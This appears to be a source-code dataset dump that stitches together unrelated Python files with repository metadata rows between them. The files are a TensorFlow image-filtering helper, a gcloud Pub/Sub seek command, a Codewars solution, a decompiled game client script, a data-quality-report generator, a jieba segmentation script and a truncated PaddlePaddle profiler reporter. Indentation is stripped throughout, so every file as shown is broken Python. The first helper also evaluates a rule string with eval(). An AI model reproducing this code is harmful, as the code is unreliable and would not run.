# Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.get_model_path(model_name, 'frozen graph'), 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine
path_to_labels = self.get_model_path(model_name, 'labels')
label_map = label_map_util.load_labelmap(path_to_labels)
categories_dict = self.get_model_categories_dict(model_name)
num_classes = len(categories_dict)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=num_classes, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
#
# Detection
#
with detection_graph.as_default():
with tf.Session(graph=detection_graph) as sess:
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') # Definite input and output Tensors for detection_graph
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0') # Each box represents a part of the image where a particular object was detected.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0') # Each score represent how level of confidence for each of the objects.
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
#
# Image Detection Loop
#
for image_path in image_path_list:
#
# prepare image for model input
#
#tmp non relitive path test
script_dir = os.path.dirname(os.path.abspath(__file__))
image = Image.open(os.path.join(script_dir, image_path))
#image = Image.open(image_path)
image_np = self.load_image_into_numpy_array(image)
image_np_expanded = np.expand_dims(image_np, axis=0) # Expand dimensions since the model expects images to have shape: [1, None, None, 3]
#
# Detection
#
(boxes, scores, classes, num) = sess.run([detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
"""
# new code
if prevent_overlap:
iou_threshold = 0.5 #overlap threshold
max_output_size = 2 #max num boxes overlap threshold
selected_indices = tf.image.non_max_suppression( boxes, scores, max_output_size, iou_threshold)
boxes = tf.gather(boxes, selected_indices) #returns selected boxes
scores = tf.gather(np.squeeze(scores), selected_indices) #returns selected
classes = tf.gather(np.squeeze(classes), selected_indices) #returns selected
"""
#
# Reformat results
#
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
classes = np.squeeze(classes).astype(np.int32)
#
# Get selected items (box, class, score)
#
#selected classes are all categories current model is set to evaluate
selected_categories = self.get_model_evaluation_categories(model_name)
image_items_list = []
if min_score_thresh is not None:
mst_decimal = min_score_thresh * 0.01 #convert to decimal
image_items_list = self._image_info(category_index, selected_categories, image_np, boxes, scores, classes, mst_decimal)
else:
image_items_list = self._image_info(category_index, selected_categories, image_np, boxes, scores, classes)
# add to / combine image items list
image_info_bundel[image_path]['image_items_list'] += image_items_list
#
# meta data - PLEASE STORE FOR USE IN XML ANNOTATIONS
#
image_path, image_folder, image_filename = self.get_path_data(image_path)
image_height, image_width = self.image_dimensions(image_np)
image_info_bundel[image_path]['image_path'] = image_path
image_info_bundel[image_path]['image_folder'] = image_folder
image_info_bundel[image_path]['image_filename'] = image_filename
image_info_bundel[image_path]['image_height'] = image_height
image_info_bundel[image_path]['image_width'] = image_width
return image_info_bundel
def remove_string_start_end_whitespace(self, string):
if string[0] == ' ':
string = string[1:]
if string[-1] == ' ':
string = string[:-1]
return string
def category_2_symbol(self, category_name):
return category_name.strip()
def _any(self, category_name, min_score, image_items_list):
""" return True if one or more of the category name was detected above minimum score """
for item in image_items_list:
if (item['class'] == category_name) and (item['score'] > min_score): return True
return False
def _num(self, category_name, min_score, image_items_list):
""" return number of the category name detected above minimum score """
num_detected = 0
for item in image_items_list:
if (item['class'] == category_name) and (item['score'] > min_score): num_detected += 1
return num_detected
def boolean_image_evaluation(self, image_path_list, boolean_categories_present):
""" accepts list of paths to images and common boolean expression of categories present ex: any('person',30.0) or (num('basketball', 60.0) > 2)"""
image_info_bundel = self.get_image_info(image_path_list)
image_boolean_bundel = dict((image_path, False) for image_path in image_path_list) #key= path, value is set to false initally
for image_path, image_info in image_info_bundel.items():
any = lambda category_name, min_score : self._any(category_name, min_score, image_info['image_items_list'])
num = lambda category_name, min_score : self._num(category_name, min_score, image_info['image_items_list'])
scope = locals()
image_boolean_bundel[image_path] = eval(boolean_categories_present, scope)
return image_boolean_bundel, image_info_bundel
def move_images_bool_rule(self, input_image_directory_path, image_output_directory_path, bool_rule, annotations_output_directory_path = False, annotations_min_score_thresh=None, annotations_selected_category_list=None):
""" given input directory of images (currently JPEG), move selected images that satisfy bool rule to new directory, create annotation directory (xml) if specifeid. """
# get all image paths in directory
accpeted_extensions = ['jpg', 'JPEG', 'jpeg']
image_path_list = []
for extension in accpeted_extensions:
glob_phrase = os.path.join(input_image_directory_path, '*.' + extension)
for image_path in glob.glob(glob_phrase):
#check image can be reshpaed tmp
try:
script_dir = os.path.dirname(os.path.abspath(__file__))
image = Image.open(os.path.join(script_dir, image_path))
image_np = self.load_image_into_numpy_array(image)
image_np_expanded = np.expand_dims(image_np, axis=0) # Expand dimensions since the model
#add
image_path_list += [image_path]
#tmp
print(image_path)
except:
print("error loading: %s" % image_path)
# evaluate
image_boolean_bundel, image_info_bundel = self.boolean_image_evaluation(image_path_list, bool_rule)
# if image output directory does not exist, create it
if not os.path.exists(image_output_directory_path): os.makedirs(image_output_directory_path)
# copy images over with same basename
for image_path, copy_bool in image_boolean_bundel.items():
if copy_bool: shutil.copy(image_path, image_output_directory_path)
#annotations
# if image output directory does not exist, create it
if annotations_output_directory_path is not False:
if not os.path.exists(annotations_output_directory_path): os.makedirs(annotations_output_directory_path)
#filter selected categories and min score threshold for image_info_bundel
if annotations_selected_category_list is not None:
image_info_bundel = self.filter_selected_categories(image_info_bundel, annotations_selected_category_list)
if annotations_min_score_thresh is not None:
image_info_bundel = self.filter_minimum_score_threshold(image_info_bundel, annotations_min_score_thresh)
#change image location data and write xml file
for image_path, image_info in image_info_bundel.items():
#if bool statment is true
if image_boolean_bundel[image_path]:
#change image location info
new_image_info = image_info
new_image_filename = os.path.basename(image_path) #same technically
new_image_folder = os.path.basename(image_output_directory_path)
new_image_path = os.path.join(image_output_directory_path, new_image_filename)
new_image_info['image_path'] = new_image_path
new_image_info['image_folder'] = new_image_folder
new_image_info['image_filename'] = new_image_filename
#write
self.write_xml_file(new_image_info, annotations_output_directory_path)
def run():
pass
"""
BASKETBALL_MODEL = {'name' : 'basketball_model_v1', 'use_display_name' : False, 'paths' : {'frozen graph': "models/basketball_model_v1/frozen_inference_graph/frozen_inference_graph.pb", 'labels' : "models/basketball_model_v1/label_map.pbtxt"}}
PERSON_MODEL = {'name' : 'ssd_mobilenet_v1_coco_2017_11_17', 'use_display_name' : True, 'paths' : {'frozen graph': "models/ssd_mobilenet_v1_coco_2017_11_17/frozen_inference_graph/frozen_inference_graph.pb", 'labels' : "models/ssd_mobilenet_v1_coco_2017_11_17/mscoco_label_map.pbtxt"}}
ie = Image_Evaluator()
ie.load_models([BASKETBALL_MODEL, PERSON_MODEL])
image_input_base_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/google-images-download/downloads/"
# for each directory in downloads
for image_dir_path in glob.glob(image_input_base_directory_path + "/*/"):
dirname = os.path.basename(image_dir_path[:-1])
print(dirname)
image_input_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/google-images-download/downloads/" + dirname
image_output_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/gather/%s_images" % dirname
annotation_output_directory_path = "/Users/ljbrown/Desktop/StatGeek/image_collecting/gather/%s_annotations" % dirname
bool_rule = "(any('basketball', 85.0) and not any('person', 15.0)) or ((num('person', 95.0) == 1) and not any('basketball', 15.0) and (num('person', 15.0) == 1)) or (any('basketball', 85.0) and (num('person', 95.0) ==1) and (num('person', 15.0) == 1))"
#print(image_input_directory_path)
#print(image_output_directory_path)
#print(annotation_output_directory_path)
ie.move_images_bool_rule(image_input_directory_path, image_output_directory_path, bool_rule, annotation_output_directory_path, 85.0, ['basketball', 'person'])
"""
| [
"[email protected]"
] | |
8d3a150e92b97edc73a1af8bcfa9566c2296219c | 23611933f0faba84fc82a1bc0a85d97cf45aba99 | /google-cloud-sdk/.install/.backup/lib/surface/pubsub/subscriptions/seek.py | 718094747211caab81d5b553f97be853d2cb982b | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | KaranToor/MA450 | 1f112d1caccebdc04702a77d5a6cee867c15f75c | c98b58aeb0994e011df960163541e9379ae7ea06 | refs/heads/master | 2021-06-21T06:17:42.585908 | 2020-12-24T00:36:28 | 2020-12-24T00:36:28 | 79,285,433 | 1 | 1 | Apache-2.0 | 2020-12-24T00:38:09 | 2017-01-18T00:05:44 | Python | UTF-8 | Python | false | false | 3,886 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cloud Pub/Sub subscriptions seek command."""
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.projects import util as projects_util
from googlecloudsdk.command_lib.pubsub import util
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class SeekAlpha(base.Command):
"""This feature is part of an invite-only release of the Cloud Pub/Sub API.
Resets a subscription's backlog to a point in time or to a given snapshot.
This feature is part of an invitation-only release of the underlying
Cloud Pub/Sub API. The command will generate errors unless you have access to
this API. This restriction should be relaxed in the near future. Please
contact [email protected] with any questions in the meantime.
"""
@staticmethod
def Args(parser):
"""Registers flags for this command."""
parser.add_argument('subscription',
help='Name of the subscription to affect.')
seek_to_parser = parser.add_mutually_exclusive_group(required=True)
seek_to_parser.add_argument(
'--time', type=arg_parsers.Datetime.Parse,
help=('The time to seek to. Messages in the subscription that '
'were published before this time are marked as acknowledged, and '
'messages retained in the subscription that were published after '
'this time are marked as unacknowledged. See `gcloud topic '
'datetimes` for information on time formats.'))
seek_to_parser.add_argument(
'--snapshot',
help=('The name of the snapshot. The snapshot\'s topic must be the same'
' as that of the subscription.'))
parser.add_argument(
'--snapshot-project', default='',
help=('The name of the project the snapshot belongs to (if seeking to '
'a snapshot). If not set, it defaults to the currently selected '
'cloud project.'))
def Collection(self):
return util.SUBSCRIPTIONS_SEEK_COLLECTION
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
A serialized object (dict) describing the results of the operation. This
description fits the Resource described in the ResourceRegistry under
'pubsub.subscriptions.seek'.
"""
msgs = self.context['pubsub_msgs']
pubsub = self.context['pubsub']
subscription_path = util.SubscriptionFormat(args.subscription)
result = {'subscriptionId': subscription_path}
seek_req = msgs.SeekRequest()
if args.snapshot:
if args.snapshot_project:
snapshot_project = (
projects_util.ParseProject(args.snapshot_project).Name())
else:
snapshot_project = ''
seek_req.snapshot = util.SnapshotFormat(args.snapshot, snapshot_project)
result['snapshotId'] = seek_req.snapshot
else:
seek_req.time = args.time.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
result['time'] = seek_req.time
pubsub.projects_subscriptions.Seek(
msgs.PubsubProjectsSubscriptionsSeekRequest(
seekRequest=seek_req, subscription=subscription_path))
return result
| [
"[email protected]"
] | |
d5819b2f4f33d1ec6a077546f64c2b6e4b92968b | 8620d98b00cf0a9f60415408bf82184efd20431a | /Codewars/Remove the parentheses.py | 4942b2db2d2619ef5572685d2c498a9e0f1200bf | [] | no_license | SA-Inc/Contest-Tasks | 628aa4028bb5e3e5efc519c1369f5c95f4b46eff | dfffaec7d93fe217f19d532a3c5c799103f2a06d | refs/heads/main | 2023-02-26T21:56:54.067172 | 2021-02-09T07:23:26 | 2021-02-09T07:23:26 | 323,820,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # https://www.codewars.com/kata/5f7c38eb54307c002a2b8cc8
def remove_parentheses(s):
# res = ''
# startIdx = None
# endIdx = None
# for i in range(len(s)):
# if s[i] == '(':
# startIdx = i
# break
# for i in reversed(range(len(s))):
# if s[i] == ')':
# endIdx = i
# break
# for i in range(len(s)):
# if i >= startIdx and i <= endIdx:
# continue
# else:
# res += s[i]
# return res
# isSkip = False
# for i in range(len(s)):
# if s[i] == '(':
# isSkip = True
# if s[i] == ')':
# isSkip = False
# continue
# if isSkip == False:
# res += s[i]
# return res
parenthesesCount = 0
res = ''
for i in s:
if i == '(':
parenthesesCount += 1
elif i == ')':
parenthesesCount -= 1
else:
if parenthesesCount == 0:
res += i
return res
| [
"[email protected]"
] | |
cfa8945289850ff63e497fcc908de2732efb4faf | bb33e6be8316f35decbb2b81badf2b6dcf7df515 | /source/res/scripts/client/gui/Scaleform/daapi/view/battle/event/hunter_respawn.py | d81a741d398ce19a72f4ca18421e45b81afc015c | [] | no_license | StranikS-Scan/WorldOfTanks-Decompiled | 999c9567de38c32c760ab72c21c00ea7bc20990c | d2fe9c195825ececc728e87a02983908b7ea9199 | refs/heads/1.18 | 2023-08-25T17:39:27.718097 | 2022-09-22T06:49:44 | 2022-09-22T06:49:44 | 148,696,315 | 103 | 39 | null | 2022-09-14T17:50:03 | 2018-09-13T20:49:11 | Python | UTF-8 | Python | false | false | 1,419 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/battle/event/hunter_respawn.py
import BigWorld
from gui.Scaleform.daapi.view.battle.event.boss_teleport import EventBossTeleportView
from gui.Scaleform.daapi.view.meta.EventHunterRespawnViewMeta import EventHunterRespawnViewMeta
from gui.wt_event.wt_event_helpers import getSpeed
from gui.impl import backport
from gui.impl.gen import R
from gui.shared.gui_items.Vehicle import getIconResourceName
class EventHunterRespawnView(EventBossTeleportView, EventHunterRespawnViewMeta):
def onRespawnPointClick(self, pointGuid):
self._chooseSpawnPoint(pointGuid)
def showSpawnPoints(self):
self._blur.enable()
timeLeft = 0
timeTotal = 0
respawnComponent = BigWorld.player().dynamicComponents.get('respawnComponent')
if respawnComponent:
timeLeft = respawnComponent.endTime - BigWorld.serverTime()
timeTotal = respawnComponent.duration
self.as_updateTimerS(timeLeft, timeTotal, replaySpeed=getSpeed())
vTypeVO = self._sessionProvider.getCtx().getVehicleInfo(BigWorld.player().playerVehicleID).vehicleType
iconName = getIconResourceName(vTypeVO.iconName)
icon = R.images.gui.maps.icons.wtevent.hunterRespawn.dyn(iconName)
if icon.exists():
self.as_setIconS(backport.image(icon()))
| [
"[email protected]"
] | |
086d727ec9d02496b8aed3098471ba7117856217 | 8b7a9ba0c2f8259ee7cfdfa83d8b702cb494c95b | /MyQuickDQR.py | a5e9a3a657d8985a49cee91a27141c9f92aff41f | [] | no_license | danyiwang/Fraud-Analytics-Coursework | cd216b7e6c57470b513bbb29eb92248d851a17b7 | 04396a7b7c13476a3493a4f3aeed36273cdf1d78 | refs/heads/master | 2020-04-25T11:56:23.792373 | 2019-04-11T09:31:55 | 2019-04-11T09:31:55 | 172,761,849 | 0 | 0 | null | 2019-02-26T18:14:05 | 2019-02-26T17:55:47 | Python | UTF-8 | Python | false | false | 13,117 | py | ## Note: the format and style can be customized.
## Process
## Step 1: read data
## import pandas as pd
## import MyQuickDQR as dqr
## mydata = pd.read_csv()
## Step 2: define category columns
## mydata[category_columns] = mydata[category_columns].astype('category')
## keep in mind that some columns may need to change from numeric to category: ZIP, etc.
## Step 3: generate Data Quality Report
## dqr.QuickDQR(mydata, 'xxx.docx')
## Step 4: If the output reads "Fail to add graph for (variable name)", you need to manually make a plot. Sorry for the inconvenience.
import pandas as pd
import numpy as np
import scipy.stats as sps
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn as skl
from docx import Document
from docx.shared import Inches
# Function to map out the summary table for Categorical Variable.
def MapCategory(cat):
# Initiate Empty Summary Table for Categorical Variable
cat_col = list(cat.columns)
t ={'colname': cat_col,
'n_record': cat_col,
'percent' : cat_col,
'unique_v': cat_col,
'mode': cat_col,
'count_mode': cat_col}
cat_table = pd.DataFrame(t)
for l in range(len(cat_table)):
cat_table.iloc[l,1] = cat.iloc[:,l].count()
cat_table.iloc[l,2] = round(cat_table.iloc[l,1] / len(cat) * 100,2)
cat_table.iloc[l,3] = len(cat.iloc[:,l].unique())
m = cat.iloc[:,l].value_counts()
cat_table.iloc[l,4] = m.index[0]
cat_table.iloc[l,5] = m.iloc[0]
return cat_table
def DesCategory(cat_table):
# Description for Categorical Variable
cat_description = []
for i in range(len(cat_table)):
name = str(cat_table['colname'][i])
n = str(int(cat_table['n_record'][i]))
p = str(round(cat_table['percent'][i],2))
unique_v = str(cat_table['unique_v'][i])
mode = str(cat_table['mode'][i])
count = str(cat_table['count_mode'][i])
cat_description.append(name+' is a categorical variable. '+name+\
' has '+n+' lines of records, and is '+p+\
'% populated. '+name+' has '+unique_v +\
' unique categories. The most common category is '\
+mode+ ', which occured '+count+' times out of '\
+n+' records. ')
return cat_description
def GraphCategory(cat):
sns.set_style("whitegrid")
# Create Category Graph
cat_col = list(cat.columns)
for c in cat_col:
m = cat[c].value_counts()
name = c + '.png'
level = len(m)
comment = []
try:
if level >= 20:
comment.append(c)
if m.iloc[0] / m.iloc[2] >= 8: # If the scale has too big difference
plot = cat[c].value_counts().head(20).plot(kind='bar')
plot.set_yscale('log')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
plot = cat[c].value_counts().head(20).plot(kind='bar')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
if m.iloc[0] / m.iloc[2] >= 8: # If the scale has too big difference
plot = cat[c].value_counts().plot(kind='bar')
plot.set_yscale('log')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
plot = cat[c].value_counts().plot(kind='bar')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
except:
print('Fail to create graph for', c, '. Try manually.')
# Description for Categorical Variable: comment on graphs
cat_description = []
for c in cat_col:
if c in comment:
cat_description.append('Below is a graph showing the destribution of '+c+': ')
else:
cat_description.append('Below is a graph showing the destribution of '+c+': (Showing top 20 categories)')
return cat_description
# Initiate Summary Table for Numerical Variable
def MapNumeric(num):
num_col = list(num.columns)
t ={'colname': num_col,
'n_record': num_col,
'percent' : num_col,
'unique_v': num_col,
'n_zero': num_col,
'mode': num_col,
'count_mode': num_col,
'min': num_col,
'max': num_col,
'mean': num_col,
'std': num_col,
}
num_table = pd.DataFrame(t)
# Fill in the Numerical Variable Summary Table
for l in range(len(num_table)):
num_table.iloc[l,1] = num.iloc[:,l].count()
num_table.iloc[l,2] = round(num_table.iloc[l,1] / len(num) * 100,2)
num_table.iloc[l,3] = len(num.iloc[:,l].unique())
num_table.iloc[l,4] = sum(num.iloc[:,l] == 0)
m = num.iloc[:,l].value_counts()
num_table.iloc[l,5] = m.index[0]
num_table.iloc[l,6] = m.iloc[0]
num_table.iloc[l,7] = num.iloc[:,l].min()
num_table.iloc[l,8] = round(num.iloc[:,l].max(), 2)
num_table.iloc[l,9] = round(num.iloc[:,l].mean(), 2)
num_table.iloc[l,10] = round(num.iloc[:,l].std(), 2)
return num_table
def DesNumeric(num_table):
# Description for Numerical Variable
num_description1 = []
for i in range(len(num_table)):
name = str(num_table['colname'][i])
n = str(int(num_table['n_record'][i]))
p = str(round(num_table['percent'][i],2))
unique_v = str(num_table['unique_v'][i])
n_zero = str(num_table['n_zero'][i])
mode = str(num_table['mode'][i])
count = str(num_table['count_mode'][i])
min_ = str(int(num_table['min'][i]))
max_ = str(int(num_table['max'][i]))
avg = str(round(num_table['mean'][i],2))
std = str(round(num_table['std'][i],2))
num_description1.append(name+' is a numeric variable. '+name+' has '\
+n+' lines of records, and is '+p+'% populated. '\
+name+' has '+unique_v +' unique categories. '\
+'The most common value is '+mode+ ', occured '\
+count+' times. '+name+' has '+n_zero+\
' zero values out of '+n+' lines of records. '\
+'The summary statistics and distribution is as follows: '\
+'(excluding null value)')
return num_description1
def GraphNumeric(num):
# Create Graph for Numerical Variable
num_col = list(num.columns)
for c in num_col:
null_remove = num[pd.isnull(num[c]) == False]
m = null_remove[c].value_counts()
mode_count = m.iloc[0]
next_mode_count = m.iloc[4]
name = c+'.png'
try:
if (mode_count / next_mode_count) >= 5:
sns.distplot(null_remove[c],bins = 80, kde=False, rug = False).set_yscale('log')
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
else:
sns.distplot(null_remove[c],bins = 80, kde=False, rug = False)
plt.savefig(name,bbox_inches = 'tight')
plt.clf()
except:
print('Fail to create graph for',c,'. Try manually.')
def QuickDQR(mydata, filename):
# Divide fields in to Category Variable and Numerical Variable
cat = mydata.loc[:, mydata.dtypes == 'category']
num = mydata.loc[:, mydata.dtypes != 'category']
#Produce Cat Results
cat_table = MapCategory(cat)
cat_description1 = DesCategory(cat_table)
cat_description2 = GraphCategory(cat)
#Produce Num Results
num_table = MapNumeric(num)
num_description1 = DesNumeric(num_table)
GraphNumeric(num)
# Document Output!!!
document = Document()
document.add_heading('Data Quality Report', 0)
# High-level summary
document.add_heading('High-Level Description of the Data',level = 1)
document.add_paragraph('This dataset shows the information about (dataset name). '\
+'It covers the period from (1/1/2010) to (12/31/2010). '\
+'The dataset has '+str(mydata.shape[1])+\
' fields and '+str(mydata.shape[0])+' records.', style = 'Body Text')
# Summary table of all fields
document.add_heading('Summary Table of All Fields',level = 1)
document.add_paragraph('After understanding each field, I re-categorized '\
+'those fields into numerical and categorical fields. '\
+str(len(num_table))+' field is recognized as numerical field '\
+'and the rest of the '+str(len(cat_table))+' fields are categorical fields. '\
+'The following are two summary tables for categorical fields '\
+'and numerical fields followed by each individual field’s '\
+'detailed description respectively.',style = 'Body Text')
# Categorical Variable:
document.add_heading('Categorical Variable Summary: ', level = 2)
# Initiate Summary Table Header
table = document.add_table(rows = 1, cols = 6, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Most Common Category'
hdr_cells[5].text = 'Occurance of Common Category'
# Fill in Summary Table Cell
cat_col = list(cat.columns)
for i in range(len(cat_col)):
row_cells = table.add_row().cells
for j in range(6):
row_cells[j].text = str(cat_table.iloc[i,j])
# Individual Field:
document.add_heading('Individual Fields: ', level = 3)
for i in range(len(cat_description1)):
name = cat_col[i]
document.add_paragraph(name, style = 'List Number')
document.add_paragraph(cat_description1[i], style = 'Body Text')
table = document.add_table(rows = 1, cols = 6, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Most Common Category'
hdr_cells[5].text = 'Occurance of Common Category'
row_cells = table.add_row().cells
for j in range(6):
row_cells[j].text = str(cat_table.iloc[i,j])
document.add_paragraph(cat_description2[i], style = 'Body Text')
try:
document.add_picture(name+'.png')
except:
print('Fail to add graph for',name,'. Try manually. ')
# Numeric Variable:
document.add_heading('Numeric Variable Summary: ', level = 2)
# Initiate Summary Table Header
table = document.add_table(rows = 1, cols = 11, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Number of Zero'
hdr_cells[5].text = 'Most Common Value'
hdr_cells[6].text = 'Occurance of Common Value'
hdr_cells[7].text = 'Min'
hdr_cells[8].text = 'Max'
hdr_cells[9].text = 'Average'
hdr_cells[10].text = 'Standard Deviation'
# Fill in Summary Table Cell
num_col = list(num.columns)
for i in range(len(num_col)):
row_cells = table.add_row().cells
for j in range(11):
row_cells[j].text = str(num_table.iloc[i,j])
# Individual Field:
document.add_heading('Individual Fields: ', level = 3)
for i in range(len(num_description1)):
name = num_col[i]
document.add_paragraph(name, style = 'List Number')
document.add_paragraph(num_description1[i], style = 'Body Text')
table = document.add_table(rows = 1, cols = 11, style = 'Light Grid Accent 1')
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Field'
hdr_cells[1].text = 'Number of Records'
hdr_cells[2].text = 'Populated %'
hdr_cells[3].text = 'Unique Value'
hdr_cells[4].text = 'Number of Zero'
hdr_cells[5].text = 'Most Common Value'
hdr_cells[6].text = 'Occurance of Common Value'
hdr_cells[7].text = 'Min'
hdr_cells[8].text = 'Max'
hdr_cells[9].text = 'Average'
hdr_cells[10].text = 'Standard Deviation'
row_cells = table.add_row().cells
for j in range(11):
row_cells[j].text = str(num_table.iloc[i,j])
try:
document.add_picture(name+'.png')
except:
print('Fail to add graph for',name,'. Try manually. ')
document.save(filename)
| [
"[email protected]"
] | |
61d2d4e19055b2c5e330f42f506a5a25e1550bae | c0b3e2e92efe8e2a2497a0850b136f42e59d9303 | /预分词.py | 86a1088574c1a4fd86b5ef5f69200a42588ea4a9 | [] | no_license | Asuraqi/AushorShipAnalysis | 126236b053a47947f344c05ab73a174650973c8e | 1cc2a96f9e02e31b9f671ab88151fc0138db9c8e | refs/heads/master | 2022-11-17T13:12:05.412748 | 2020-07-11T15:30:09 | 2020-07-11T15:30:09 | 278,858,763 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 932 | py | import os
import re
import numpy as np
import jieba
import jieba.posseg
TRAIN_DIR = r"E:\TrainData"
OUT_DIR = r"D:\output_train"
for train_file in os.listdir(TRAIN_DIR):
file_path = os.path.join(TRAIN_DIR, train_file)
out_path = os.path.join(OUT_DIR, train_file + ".seg")
if os.path.exists(out_path):
print('eeeee')
continue
print(file_path)
with open(out_path, 'w', encoding='utf-8') as out:
with open(file_path, 'r', encoding='utf-8') as f:
for line in f.readlines():
author_id, novel_id, chapter_id, content = line.strip('\n').split('\t')
word_list = []
for word, flag in jieba.posseg.cut(content):
if flag.startswith("x"):
continue
word_list.append(word + "/" + flag)
out.write(' '.join(word_list) + '\n') | [
"[email protected]"
] | |
39765aad0f84ce97c089987f6a920f1900d8407c | 974d04d2ea27b1bba1c01015a98112d2afb78fe5 | /tools/CrossStackProfiler/CspReporter.py | 7ae672a2e99fd3f8e3f64c223b2fc2c9a0b3ecf5 | [
"Apache-2.0"
] | permissive | PaddlePaddle/Paddle | b3d2583119082c8e4b74331dacc4d39ed4d7cff0 | 22a11a60e0e3d10a3cf610077a3d9942a6f964cb | refs/heads/develop | 2023-08-17T21:27:30.568889 | 2023-08-17T12:38:22 | 2023-08-17T12:38:22 | 65,711,522 | 20,414 | 5,891 | Apache-2.0 | 2023-09-14T19:20:51 | 2016-08-15T06:59:08 | C++ | UTF-8 | Python | false | false | 8,467 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import glob
import os
from multiprocessing import Process
from CspFileReader import (
DCGM_PATH,
FILEORGANIZEFORM_BYRANK,
FILEORGANIZEFORM_BYTRAINER,
NET_PATH,
PROFILE_PATH,
TIME_PATH,
getLogger,
)
from DCGMFileReader import dcgmFileReader
from ProfileFileReader import profileFileReader
def get_argparse():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--profile_path',
type=str,
default='.',
help='Working path that store the monitor data.',
)
parser.add_argument(
'--timeline_path',
type=str,
default='.',
help='Output timeline file name.',
)
parser.add_argument(
'--gpuPerTrainer', type=int, default=8, help='Gpus per trainer.'
)
parser.add_argument(
'--trainerNum', type=int, default=4, help='Num of trainer.'
)
parser.add_argument(
'--groupSize', type=int, default=8, help='Num of trainer in a group.'
)
parser.add_argument(
'--displaySize',
type=int,
default=2,
help='Num of line need to display in a group.',
)
return parser.parse_args()
class CspReporter:
def __init__(self, args):
self._args = args
print(self._args)
self._workPath = self._args.profile_path
self._saveFilePath = self._args.timeline_path
self._gpuPerTrainer = self._args.gpuPerTrainer
self._groupSize = self._args.groupSize
self._displaySize = self._args.displaySize
self._trainerNum = self._args.trainerNum
self._checkArgs()
self._init_logger()
self._init_timeInfo()
self._init_reader()
def _checkArgs(self):
if self._trainerNum % self._groupSize != 0:
raise Exception(
"Input args error: trainerNum[%d] %% groupSize[%d] != 0"
% (self._trainerNum, self._groupSize)
)
def _init_logger(self):
self._logger = getLogger()
def _init_reader(self):
self._dcgmPath = os.path.join(self._workPath, DCGM_PATH)
self._netPath = os.path.join(self._workPath, NET_PATH)
self._profilePath = os.path.join(self._workPath, PROFILE_PATH)
self._netFileReaderArgs = {
"dataPath": self._netPath,
"groupSize": self._groupSize,
"displaySize": self._displaySize,
"gpuPerTrainer": self._gpuPerTrainer,
"minTimeStamp": self._minTimeStamp,
"organizeForm": FILEORGANIZEFORM_BYTRAINER,
}
self._dcgmFileReaderArgs = {
"dataPath": self._dcgmPath,
"groupSize": self._groupSize,
"displaySize": self._displaySize,
"gpuPerTrainer": self._gpuPerTrainer,
"minTimeStamp": self._minTimeStamp,
"organizeForm": FILEORGANIZEFORM_BYTRAINER,
}
self._profileFileReaderArgs = {
"dataPath": self._profilePath,
"groupSize": self._groupSize,
"displaySize": self._displaySize,
